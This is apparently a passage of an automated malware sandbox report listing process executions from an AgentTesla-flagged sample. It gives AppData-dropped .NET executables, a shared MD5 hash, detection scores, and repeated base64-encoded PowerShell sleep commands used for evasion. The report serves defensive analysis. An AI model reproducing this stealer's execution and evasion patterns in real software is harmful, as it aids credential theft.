                                        Path:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                                        Imagebase:0x7ff745070000
                                        File size:1863168 bytes
                                        MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 33%, ReversingLabs
                                        Reputation:low

                                        Target ID:18
                                        Start time:18:31:53
                                        Start date:20/03/2023
                                        Path:C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe"
                                        Imagebase:0xe00000
                                        File size:1863168 bytes
                                        MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:low

                                        Target ID:19
                                        Start time:18:31:55
                                        Start date:20/03/2023
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                        Imagebase:0x1350000
                                        File size:430592 bytes
                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:high

                                        Target ID:20
                                        Start time:18:31:55
                                        Start date:20/03/2023
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        Target ID:21
                                        Start time:18:32:02
                                        Start date:20/03/2023
                                        Path:C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe"
                                        Imagebase:0x9f0000
                                        File size:1863168 bytes
                                        MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET

                                        Target ID:24
                                        Start time:18:32:28
                                        Start date:20/03/2023
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                        Imagebase:0x1350000
                                        File size:430592 bytes
                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET

                                        Target ID:25
                                        Start time:18:32:28
                                        Start date:20/03/2023
                                        Path:C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
                                        Imagebase:0x130000
                                        File size:1863168 bytes
                                        MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language

                                        Target ID:26
                                        Start time:18:32:28
                                        Start date:20/03/2023
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff745070000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language

                                        Target ID:27
                                        Start time:18:32:30
                                        Start date:20/03/2023
                                        Path:C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
                                        Wow64 process (32bit):true
                                        Commandline:C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe
                                        Imagebase:0x950000
                                        File size:1863168 bytes
                                        MD5 hash:AE2A3B41292C66A9DD6F10C874C05293
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001B.00000002.534154582.0000000002F7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

                                        Target ID:28
                                        Start time:18:32:50
                                        Start date:20/03/2023
                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
                                        Imagebase:0x1350000
                                        File size:430592 bytes
                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:.Net C# or VB.NET

                                        Target ID:29
                                        Start time:18:32:50
                                        Start date:20/03/2023
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff68f300000
                                        File size:625664 bytes
                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language

                                        No disassembly